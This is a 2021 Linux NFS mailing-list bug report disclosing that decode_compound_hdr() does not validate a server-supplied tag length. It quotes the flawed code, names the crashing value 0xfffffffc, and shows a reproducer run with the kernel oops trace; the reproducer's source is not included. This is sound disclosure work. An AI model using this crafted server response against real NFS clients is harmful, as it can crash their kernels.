To: Trond Myklebust, Anna Schumaker
Cc: linux-nfs@vger.kernel.org
From: rtm@csail.mit.edu
Subject: NFS client RPC bug
Date: Thu, 04 Nov 2021 16:10:38 -0400
Message-ID: <7517.1636056638@crash.local>
X-Mailing-List: linux-nfs@vger.kernel.org

decode_compound_hdr() in fs/nfs/nfs4xdr.c adds the taglen supplied by the
server to a pointer and then dereferences it, but does not first check
taglen for sanity:

    p = xdr_inline_decode(xdr, 8);
    ...;
    hdr->taglen = be32_to_cpup(p);
    ...;
    p = xdr_inline_decode(xdr, hdr->taglen + 4);
    ...;
    p += XDR_QUADLEN(hdr->taglen);
    hdr->nops = be32_to_cpup(p);

The second xdr_inline_decode() limits the opportunities for an
attacker-controlled pointer dereference, but a taglen of 0xfffffffc will
cause a kernel page fault.

I've attached a program that tickles the bug on my kernel 5.15 machine:

    # uname -a
    Linux (none) 5.15.0-rc7-dirty #15 SMP Thu Nov 4 19:20:36 UTC 2021 riscv64 riscv64 riscv64 GNU/Linux
    # cc nfs_1.c
    # ./a.out
    mount:mount.nfs: timeout set for Thu Jan 1 00:02:12 1970
    mount.nfs: trying text-based options 'vers=4.2,addr=127.0.0.1,clientaddr=127.0.0.1'
    accept returned 4
    proc 0
    proc 1
    exception pc=0xffffffff8022dcd8 cause=d symbolic tval=0xffffffe102c5aad8
    [   16.101267] Unable to handle kernel paging request at virtual address ffffffe102c5aad8
    [   16.112762] Oops [#1]
    [   16.116973] Modules linked in:
    [   16.122429] CPU: 0 PID: 60 Comm: mount.nfs Not tainted 5.15.0-rc7-dirty #13
    [   16.131634] Hardware name: ucbbar,riscvemu-bare (DT)
    [   16.138694] epc : decode_compound_hdr+0x96/0x12e
    [   16.146706]  ra : decode_compound_hdr+0x82/0x12e
    [   16.154151] epc : ffffffff8022dcd8 ra : ffffffff8022dcc4 sp : ffffffd00057b6e0
    ...
    [   16.272291] status: 0000000200000121 badaddr: ffffffe102c5aad8 cause: 000000000000000d
    [   16.282369] [] decode_compound_hdr+0x96/0x12e
    [   16.290699] [] nfs4_xdr_dec_exchange_id+0x32/0x57e
    [   16.299265] [] rpcauth_unwrap_resp_decode+0x12/0x1a
    [   16.307926] [] rpcauth_unwrap_resp+0x12/0x1a
    [   16.316196] [] call_decode+0x112/0x176
    [   16.323488] [] __rpc_execute+0x76/0x216
    [   16.330751] [] rpc_execute+0x58/0x7e
    [   16.337966] [] rpc_run_task+0x12c/0x16c
    [   16.345113] [] nfs4_run_exchange_id+0x1d8/0x262
    [   16.353364] [] _nfs4_proc_exchange_id+0x24/0x2ba
    [   16.361556] [] nfs4_proc_exchange_id+0x30/0x50
    [   16.369829] [] nfs41_discover_server_trunking+0x1c/0xa8
    [   16.378421] [] nfs4_discover_server_trunking+0x7c/0x1e8
    [   16.386958] [] nfs4_init_client+0x92/0xf6
    [   16.394014] [] nfs_get_client+0x36a/0x394
    [   16.401147] [] nfs4_set_client+0xd6/0x13e
    [   16.410346] [] nfs4_create_server+0xb8/0x208
    [   16.421493] [] nfs4_try_get_tree+0x16/0x4c
    [   16.432759] [] nfs_get_tree+0x34a/0x3ac
    [   16.442283] [] vfs_get_tree+0x18/0x88
    [   16.451889] [] path_mount+0x4f4/0x77a
    [   16.461619] [] do_mount+0x4c/0x7e
    [   16.470833] [] sys_mount+0xca/0x14e
    [   16.480401] [] ret_from_syscall+0x0/0x2

[Attachment: nfs_1.c (application/octet-stream, base64); contents not reproduced here]